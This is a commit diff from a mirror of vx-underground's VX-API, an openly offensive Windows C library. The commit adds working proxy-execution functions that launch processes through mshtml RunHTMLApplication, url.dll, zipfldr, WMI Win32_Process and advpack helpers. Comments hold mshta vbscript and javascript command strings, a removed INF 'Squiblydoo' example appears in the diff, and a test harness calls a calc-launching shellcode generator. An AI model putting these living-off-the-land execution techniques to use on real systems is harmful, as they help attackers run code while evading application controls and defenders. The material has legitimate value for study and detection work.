mirror of https://github.com/vxunderground/VX-API
parent
f2f28f9a55
commit
1620dd9894
11
README.md
11
README.md
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.684
|
||||
Version: 2.0.709
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -92,6 +92,8 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| XpressMaximumDecompressBuffer | smelly__vx |
|
||||
| XpressStandardCompressBuffer | smelly__vx |
|
||||
| XpressStandardDecompressBuffer | smelly__vx |
|
||||
| MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu |
|
||||
| ExtractFilesFromCabIntoTarget | smelly__vx |
|
||||
|
||||
|
||||
## Error Handling
|
||||
|
@ -137,6 +139,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| GetPidFromPidBruteForcing | modexp |
|
||||
| GetPidFromNtQueryFileInformation | modexp, Lloyd Davies, Jonas Lyk |
|
||||
| GetPidFromPidBruteForcingExW | smelly__vx, LLoyd Davies, Jonas Lyk, modexp |
|
||||
| IsProcessRunningAsAdmin2 | smelly__vx |
|
||||
|
||||
|
||||
## Helper Functions
|
||||
|
@ -144,7 +147,6 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| ------------- | --------------- |
|
||||
| CreateLocalAppDataObjectPath | smelly__vx |
|
||||
| CreateWindowsObjectPath | smelly__vx |
|
||||
| DeleteFileWithCreateFileFlag | smelly__vx |
|
||||
| GetCurrentDirectoryFromUserProcessParameters | smelly__vx |
|
||||
| GetCurrentProcessIdFromTeb | ReactOS |
|
||||
| GetCurrentUserSid | Giovanni Dicanio |
|
||||
|
@ -212,9 +214,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfGetLsaPidFromRegistry | modexp |
|
||||
| MpfGetLsaPidFromNamedPipe | modexp |
|
||||
| MpfComMonitorChromeSessionOnce | smelly__vx |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 |
|
||||
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey |
|
||||
| MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu |
|
||||
| MpfPiControlInjection | SafeBreach Labs |
|
||||
| MpfPiQueueUserAPCViaAtomBomb | SafeBreach Labs |
|
||||
| MpfPiWriteProcessMemoryCreateRemoteThread | SafeBreach Labs |
|
||||
|
@ -294,6 +294,8 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| ------------- | --------------- |
|
||||
| CopyFileViaSetupCopyFile | smelly__vx |
|
||||
| CreateFileFromDsCopyFromSharedFile | Jonas Lyk |
|
||||
| DeleteDirectoryAndSubDataViaDelNode | smelly__vx |
|
||||
| DeleteFileWithCreateFileFlag | smelly__vx |
|
||||
|
||||
|
||||
## Process Creation
|
||||
|
@ -314,6 +316,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| CreateProcessFromPcwUtil | smelly__vx |
|
||||
| CreateProcessFromShdocVwOpenUrl | smelly__vx |
|
||||
| CreateProcessFromShell32ShellExecRun | smelly__vx |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 |
|
||||
|
||||
|
||||
## Rad98 Hooking Engine
|
||||
|
|
|
@ -24,4 +24,5 @@ PWCHAR CaplockStringW(_In_ PWCHAR Ptr)
|
|||
sv++;
|
||||
}
|
||||
return Ptr;
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
@ -5,6 +5,7 @@ BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination)
|
|||
return SetupDecompressOrCopyFileW(Source, Destination, FILE_COMPRESSION_NONE);
|
||||
}
|
||||
|
||||
|
||||
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination)
|
||||
{
|
||||
WCHAR wSource[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
|
|
@ -1,53 +0,0 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
/*
|
||||
|
||||
Example .inf file
|
||||
_______________
|
||||
///////////////
|
||||
‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
|
||||
; ----------------------------------------------------------------------
|
||||
; Required Sections
|
||||
; ----------------------------------------------------------------------
|
||||
[Version]
|
||||
Signature=$CHICAGO$
|
||||
Provider=test
|
||||
Class=Printer
|
||||
|
||||
[Manufacturer]
|
||||
HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64
|
||||
|
||||
; ----------------------------------------------------------------------
|
||||
; Models Section
|
||||
; ----------------------------------------------------------------------
|
||||
[ModelsSection.NTx86]
|
||||
UnregisterDlls = Squiblydoo
|
||||
|
||||
[ModelsSection.NTia64]
|
||||
UnregisterDlls = Squiblydoo
|
||||
|
||||
[ModelsSection.NTamd64]
|
||||
UnregisterDlls = Squiblydoo
|
||||
|
||||
; ----------------------------------------------------------------------
|
||||
; Support Sections
|
||||
; ----------------------------------------------------------------------
|
||||
[DefaultInstall]
|
||||
UnregisterDlls = Squiblydoo
|
||||
|
||||
[Squiblydoo]
|
||||
calc.exe
|
||||
_______________
|
||||
///////////////
|
||||
‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
|
||||
*/
|
||||
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
|
||||
{
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection)
|
||||
{
|
||||
return FALSE;
|
||||
}
|
|
@ -0,0 +1,43 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
//CreateProcessFromMsHTMLW(L"vbscript:CreateObject(\"WScript.Shell\").Run(\"calc.exe\",0)(Window.Close)")
|
||||
//CreateProcessFromMsHTMLW(L"\"javascript:close((V=(v=new ActiveXObject('SAPI.SpVoice')).GetVoices()).count&&v.Speak('Hello! I am '+V(0).GetAttribute('Gender')))\"");
|
||||
|
||||
|
||||
BOOL CreateProcessFromMsHTMLW(LPCWSTR MshtaCommand)
|
||||
{
|
||||
typedef HRESULT(WINAPI* RUNHTMLAPPLICATION)(HINSTANCE, HINSTANCE, LPSTR, INT);
|
||||
RUNHTMLAPPLICATION RunHtmlApplication = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
WCHAR wBinaryBuffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
WCHAR Payload[MAX_PATH * sizeof(WCHAR) * 2] = { 0 };
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
if (GetProcessPathFromLoaderLoadModuleW(MAX_PATH * sizeof(WCHAR), wBinaryBuffer) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
StringConcatW(Payload, L"\"");
|
||||
StringConcatW(Payload, wBinaryBuffer);
|
||||
StringConcatW(Payload, L"\"");
|
||||
StringConcatW(Payload, L" ");
|
||||
StringConcatW(Payload, MshtaCommand);
|
||||
|
||||
if (!RtlSetBaseUnicodeCommandLine(Payload))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"mshtml.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RunHtmlApplication = (RUNHTMLAPPLICATION)GetProcAddressA((DWORD64)hMod, "RunHTMLApplication");
|
||||
if (!RunHtmlApplication)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RunHtmlApplication(NULL, NULL, NULL, 0);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -30,6 +30,7 @@ EXIT_ROUTINE:
|
|||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile)
|
||||
{
|
||||
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile)
|
||||
BOOL CreateProcessFromShell32ShellExecRunW(LPCWSTR PathToFile)
|
||||
{
|
||||
typedef VOID(WINAPI* SHELLEXEC_RUNDLLW)(HWND, HINSTANCE, LPCWSTR, INT);
|
||||
SHELLEXEC_RUNDLLW ShellExec_RunDllW = NULL;
|
||||
|
@ -25,7 +25,7 @@ EXIT_ROUTINE:
|
|||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile)
|
||||
BOOL CreateProcessFromShell32ShellExecRunA(LPCSTR PathToFile)
|
||||
{
|
||||
typedef VOID(WINAPI* SHELLEXEC_RUNDLLA)(HWND, HINSTANCE, LPCSTR, INT);
|
||||
SHELLEXEC_RUNDLLA ShellExec_RunDllA = NULL;
|
|
@ -0,0 +1,59 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateProcessFromUrlFileProtocolHandlerW(LPCWSTR PathToUrlFile)
|
||||
{
|
||||
typedef HINSTANCE(WINAPI* FILEPROTOCOLHANDLERA)(HWND, HINSTANCE, LPCSTR, INT);
|
||||
FILEPROTOCOLHANDLERA FileProtocolHandlerA = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
|
||||
|
||||
if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"url.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FileProtocolHandlerA = (FILEPROTOCOLHANDLERA)GetProcAddressA((DWORD64)hMod, "FileProtocolHandlerA");
|
||||
if (!FileProtocolHandlerA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FileProtocolHandlerA(NULL, NULL, ccPathToUrlFile, SW_SHOW);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromUrlFileProtocolHandlerA(LPCSTR PathToUrlFile)
|
||||
{
|
||||
typedef HINSTANCE(WINAPI* FILEPROTOCOLHANDLERA)(HWND, HINSTANCE, LPCSTR, INT);
|
||||
FILEPROTOCOLHANDLERA FileProtocolHandlerA = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"url.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FileProtocolHandlerA = (FILEPROTOCOLHANDLERA)GetProcAddressA((DWORD64)hMod, "FileProtocolHandlerA");
|
||||
if (!FileProtocolHandlerA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FileProtocolHandlerA(NULL, NULL, PathToUrlFile, SW_SHOW);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,59 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateProcessFromUrlOpenUrlW(LPCWSTR PathToUrlFile)
|
||||
{
|
||||
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
|
||||
OPENURL OpenUrl = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
|
||||
|
||||
if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"url.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenURL");
|
||||
if (!OpenUrl)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl(NULL, NULL, ccPathToUrlFile);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromUrlOpenUrlA(LPCSTR PathToUrlFile)
|
||||
{
|
||||
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
|
||||
OPENURL OpenUrl = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"url.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenUrl");
|
||||
if (!OpenUrl)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl(NULL, NULL, PathToUrlFile);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,115 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD CreateProcessFromWmiWin32_ProcessW(LPCWSTR BinaryPath)
|
||||
{
|
||||
HRESULT Result;
|
||||
IWbemLocator* Locator = NULL;
|
||||
IWbemServices* Services = NULL;
|
||||
IWbemClassObject* Win32ProcessStartupObject = NULL;
|
||||
IWbemClassObject* StartupInstance = NULL;
|
||||
IWbemClassObject* Win32ProcessObject = NULL;
|
||||
IWbemClassObject* ParameterInformationObject = NULL;
|
||||
IWbemClassObject* ParametersObject = NULL;
|
||||
IWbemClassObject* StartupResponseObject = NULL;
|
||||
VARIANT varCommand;
|
||||
VARIANT vtDispatch;
|
||||
|
||||
BOOL bFlag = FALSE;
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
|
||||
Result = CoInitializeEx(0, COINIT_MULTITHREADED);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = CoCreateInstance(CLSID_WbemLocator, NULL, 1, IID_IWbemLocator, (LPVOID*)&Locator);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Locator->ConnectServer((BSTR)L"ROOT\\CIMV2", NULL, NULL, 0, NULL, 0, 0, &Services);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = CoSetProxyBlanket(Services, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Services->GetObjectW((BSTR)L"Win32_ProcessStartup", 0, NULL, &Win32ProcessStartupObject, NULL);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Win32ProcessStartupObject->SpawnInstance(0, &StartupInstance);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Services->GetObjectW((BSTR)L"Win32_Process", 0, NULL, &Win32ProcessObject, NULL);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Win32ProcessObject->GetMethod((BSTR)L"Create", 0, &ParameterInformationObject, NULL);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = ParameterInformationObject->SpawnInstance(0, &ParametersObject);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
VariantInit(&varCommand);
|
||||
varCommand.vt = VT_BSTR;
|
||||
varCommand.bstrVal = (BSTR)BinaryPath;
|
||||
|
||||
Result = ParametersObject->Put((BSTR)L"CommandLine", 0, &varCommand, 0);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
VariantInit(&vtDispatch);
|
||||
vtDispatch.vt = VT_DISPATCH;
|
||||
vtDispatch.byref = StartupInstance;
|
||||
|
||||
Result = ParametersObject->Put((BSTR)L"ProcessStartupInformation", 0, &vtDispatch, 0);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Services->ExecMethod((BSTR)L"Win32_Process", (BSTR)L"Create", 0, NULL, ParametersObject, &StartupResponseObject, NULL);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (!bFlag)
|
||||
{
|
||||
if (Result != S_OK)
|
||||
dwError = Win32FromHResult(Result);
|
||||
else
|
||||
dwError = GetLastErrorFromTeb();
|
||||
}
|
||||
|
||||
if (Locator)
|
||||
Locator->Release();
|
||||
|
||||
if (Services)
|
||||
Services->Release();
|
||||
|
||||
if (Win32ProcessStartupObject)
|
||||
Win32ProcessStartupObject->Release();
|
||||
|
||||
if (StartupInstance)
|
||||
StartupInstance->Release();
|
||||
|
||||
if (Win32ProcessObject)
|
||||
Win32ProcessObject->Release();
|
||||
|
||||
if (ParameterInformationObject)
|
||||
ParameterInformationObject->Release();
|
||||
|
||||
if (ParametersObject)
|
||||
ParametersObject->Release();
|
||||
|
||||
if (StartupResponseObject)
|
||||
StartupResponseObject->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return dwError;
|
||||
}
|
|
@ -0,0 +1,59 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateProcessFromZipfldrRouteCallW(LPCWSTR PathToFile)
|
||||
{
|
||||
typedef VOID(WINAPI* ROUTETHECALL)(HWND, HINSTANCE, LPCSTR);
|
||||
ROUTETHECALL RouteTheCall = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
CHAR ccPath[MAX_PATH] = { 0 };
|
||||
|
||||
hMod = LoadLibraryW(L"zipfldr.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (WCharStringToCharString(ccPath, (PWCHAR)PathToFile, StringLengthW(PathToFile)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RouteTheCall = (ROUTETHECALL)GetProcAddressA((DWORD64)hMod, "RouteTheCall");
|
||||
if (!RouteTheCall)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RouteTheCall(NULL, NULL, ccPath);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromZipfldrRouteCallA(LPCSTR PathToFile)
|
||||
{
|
||||
typedef VOID(WINAPI* ROUTETHECALL)(HWND, HINSTANCE, LPCSTR);
|
||||
ROUTETHECALL RouteTheCall = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"zipfldr.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RouteTheCall = (ROUTETHECALL)GetProcAddressA((DWORD64)hMod, "RouteTheCall");
|
||||
if (!RouteTheCall)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RouteTheCall(NULL, NULL, PathToFile);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,61 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL DeleteDirectoryAndSubDataViaDelNodeW(LPCWSTR FullPathToDirectory)
|
||||
{
|
||||
DELNODEW DelNodeW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
DelNodeW = (DELNODEW)GetProcAddressA((DWORD64)hMod, "DelNodeW");
|
||||
if (!DelNodeW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(DelNodeW(FullPathToDirectory, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL DeleteDirectoryAndSubDataViaDelNodeA(LPCSTR FullPathToDirectory)
|
||||
{
|
||||
DELNODEW DelNodeW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
WCHAR ccBuffer[MAX_PATH * sizeof(WCHAR)] = {0};
|
||||
|
||||
if(CharStringToWCharString(ccBuffer, (PCHAR)FullPathToDirectory, StringLengthA(FullPathToDirectory)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
DelNodeW = (DELNODEW)GetProcAddressA((DWORD64)hMod, "DelNodeW");
|
||||
if (!DelNodeW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(DelNodeW(ccBuffer, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,64 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL ExtractFilesFromCabIntoTargetW(LPCWSTR CabFile, LPCWSTR OutputDirectory)
|
||||
{
|
||||
EXTRACTFILESW ExtractFilesW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ExtractFilesW = (EXTRACTFILESW)GetProcAddressA((DWORD64)hMod, "ExtractFilesW");
|
||||
if (!ExtractFilesW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(ExtractFilesW(CabFile, OutputDirectory, 0, NULL, NULL, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL ExtractFilesFromCabIntoTargetA(LPCSTR CabFile, LPCSTR OutputDirectory)
|
||||
{
|
||||
EXTRACTFILESW ExtractFilesW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
WCHAR ccCab[MAX_PATH * sizeof(WCHAR)] = {0};
|
||||
WCHAR ccOut[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
if (CharStringToWCharString(ccCab, (PCHAR)CabFile, StringLengthA(CabFile)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CharStringToWCharString(ccOut, (PCHAR)OutputDirectory, StringLengthA(OutputDirectory)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ExtractFilesW = (EXTRACTFILESW)GetProcAddressA((DWORD64)hMod, "ExtractFilesW");
|
||||
if (!ExtractFilesW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(ExtractFilesW(ccCab, ccOut, 0, NULL, NULL, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -83,7 +83,15 @@ typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
|
|||
|
||||
|
||||
|
||||
///*******************************************
|
||||
// IMAGEHLP IMPORT
|
||||
//*******************************************/
|
||||
typedef BOOL(WINAPI* IMAGEGETDIGESTSTREAM)(HANDLE, DWORD, LPVOID, PHANDLE);
|
||||
/*******************************************
|
||||
IMAGEHLP IMPORT
|
||||
/*******************************************/
|
||||
typedef BOOL(WINAPI* IMAGEGETDIGESTSTREAM)(HANDLE, DWORD, LPVOID, PHANDLE);
|
||||
|
||||
|
||||
/*******************************************
|
||||
ADVPACK IMPORT
|
||||
/*******************************************/
|
||||
typedef HRESULT(WINAPI* DELNODEW)(LPCWSTR, DWORD);
|
||||
typedef BOOL(WINAPI* ISNTADMIN)(DWORD, LPDWORD);
|
||||
typedef HRESULT(WINAPI* EXTRACTFILESW)(LPCWSTR, LPCWSTR, DWORD, LPCWSTR, LPVOID, DWORD);
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HANDLE IeCreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
|
||||
{
|
||||
typedef HANDLE(WINAPI* IECREATEFILE)(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
|
||||
IECREATEFILE IeCreateFile = NULL;
|
||||
|
||||
IeCreateFile = (IECREATEFILE)GetProcAddressA((DWORD64)TryLoadDllMultiMethodW((PWCHAR)L"ieframe.dll"), "IECreateFile");
|
||||
if (!IeCreateFile)
|
||||
return NULL;
|
||||
|
||||
return IeCreateFile(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile);
|
||||
}
|
||||
|
||||
HANDLE IeCreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
|
||||
{
|
||||
typedef HANDLE(WINAPI* IECREATEFILE)(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
|
||||
IECREATEFILE IeCreateFile = NULL;
|
||||
WCHAR ccBuffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
IeCreateFile = (IECREATEFILE)GetProcAddressA((DWORD64)TryLoadDllMultiMethodW((PWCHAR)L"ieframe.dll"), "IECreateFile");
|
||||
if (!IeCreateFile)
|
||||
return NULL;
|
||||
|
||||
if (CharStringToWCharString(ccBuffer, (PCHAR)lpFileName, StringLengthA(lpFileName)) == 0)
|
||||
return NULL;
|
||||
|
||||
return IeCreateFile(ccBuffer, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile);
|
||||
}
|
|
@ -0,0 +1,25 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsProcessRunningAsAdmin2(VOID)
|
||||
{
|
||||
ISNTADMIN IsNtAdmin = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
IsNtAdmin = (ISNTADMIN)GetProcAddressA((DWORD64)hMod, "IsNTAdmin");
|
||||
if (!IsNtAdmin)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = IsNtAdmin(0, NULL);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -2,15 +2,24 @@
|
|||
|
||||
INT main(VOID)
|
||||
{
|
||||
//////////////////////////////////////////////////////////////////////////
|
||||
//
|
||||
// The following variables are used for VX-API development and debugging,
|
||||
// they do not serve any purpose and can be removed.
|
||||
//
|
||||
//////////////////////////////////////////////////////////////////////////
|
||||
DWORD dwSize = 0;
|
||||
PCHAR Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
|
||||
PCHAR ppShellcodeBuffer = GenericShellcodeOpenCalcExitThread(&dwSize);
|
||||
WCHAR wBuffer[MAX_PATH * sizeof(WCHAR)] = L"C:\\Windows\\System32\\calc.exe";
|
||||
CHAR cBuffer[MAX_PATH] = "C:\\Windows\\System32\\calc.exe";
|
||||
|
||||
//////////////////////////////////////////////////////////////////////////
|
||||
//
|
||||
// Test area
|
||||
//
|
||||
